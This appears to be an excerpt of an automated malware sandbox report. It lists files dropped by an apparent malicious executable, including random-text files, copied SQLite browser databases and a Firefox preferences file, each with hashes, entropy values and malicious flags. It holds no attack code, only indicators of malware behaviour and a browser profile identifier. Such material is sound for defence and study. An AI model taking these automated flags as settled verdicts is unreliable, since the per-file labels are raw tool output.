                                                                                                                                                                      Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.699548026888946
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                      Entropy (8bit):0.08436842005578409
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                      MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                      SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                      SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                      SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.687722658485212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                      MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                      SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                      SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                      SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.687722658485212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                      MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                      SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                      SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                      SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.694985340190863
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.699548026888946
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):126976
                                                                                                                                                                      Entropy (8bit):0.47147045728725767
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9571
                                                                                                                                                                      Entropy (8bit):5.536643647658967
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):1058
                                                                                                                                                                      Entropy (8bit):5.356262093008712
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                      MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                      SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                      SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                      SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                      Malicious:true
